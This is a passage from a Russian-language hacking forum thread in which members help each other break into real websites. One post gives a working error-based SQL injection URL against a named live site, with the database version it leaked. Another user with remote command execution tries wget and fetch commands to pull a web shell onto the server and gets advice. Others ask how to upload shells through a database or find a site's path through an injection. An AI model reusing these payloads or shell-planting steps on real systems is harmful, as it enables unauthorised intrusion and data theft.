HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22491  
Старый 31.05.2013, 16:46
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от lessmore  
But how?
http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=%bf'%bf"
It's all very simple

_http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=1%22and(select (1)from(select(count(*)),concat((select(version()) from(information_schema.tables)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and%22

Duplicate entry '5.0.95' for key 1 Error no:1062
 
Ответить с цитированием

  #22492  
Старый 04.06.2013, 09:58
z0mbie86
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами: 8840513

Репутация: 0
По умолчанию

В web.config нашел такую строчку

Как подключится? Я так понял через клиент oracle, если да то где скачать клиент и как подключится?
 
Ответить с цитированием

  #22493  
Старый 05.06.2013, 14:04
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?
 
Ответить с цитированием

  #22494  
Старый 05.06.2013, 15:26
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

Цитата:
Сообщение от Br@!ns  
Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?
ну да, как и всегда стандартыми методами
 
Ответить с цитированием

  #22495  
Старый 05.06.2013, 17:21
Ups
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами: 7941206

Репутация: 0
По умолчанию

Нашел сайт с RCE.

Ввожу: wget http://site.ru/shell.php

Выдает:

Цитата:
Сообщение от None  
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@mail.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
С curl'ом такая же проблема.

Если написать просто wget:

Цитата:
Сообщение от None  
Usage: wget [OPTION..и т.д
Остальные команды (rm\ls -la\etc) выполняет нормально.

Могу создавать файлы. Правда если:

echo > 1.php

то:

500 Internal Server Error
 
Ответить с цитированием

  #22496  
Старый 05.06.2013, 18:20
z0mbie86
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами: 8840513

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
Программа
Navicat Premium


вот такую ошибку выдает
 
Ответить с цитированием

  #22497  
Старый 05.06.2013, 20:16
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Ups  
Нашел сайт с RCE.
Ввожу: wget http://site.ru/shell.php
Выдает:
С curl'ом такая же проблема.
Если написать просто wget:
Остальные команды (rm\ls -la\etc) выполняет нормально.
Могу создавать файлы. Правда если:
echo > 1.php
то:
500 Internal Server Error
echo "" > 1.php

и убедись, что есть права на запись.
 
Ответить с цитированием

  #22498  
Старый 05.06.2013, 20:32
Ups
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами: 7941206

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
попробуй через
fetch
Код:
fetch http://site.ru/shell.php
Выполнилось..но и ничего не закачалось.
 
Ответить с цитированием

  #22499  
Старый 05.06.2013, 20:55
Ups
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами: 7941206

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
скинь в ЛС помогу, или в icq мне напиши но скорее всего нет прав,
проверить можно указав пути
Пример
system("cd /tmp/;ls -al");
Код:
ls -al /tmp/
Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 700 bytes)

В аську отписал.
 
Ответить с цитированием

  #22500  
Старый 06.06.2013, 00:45
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.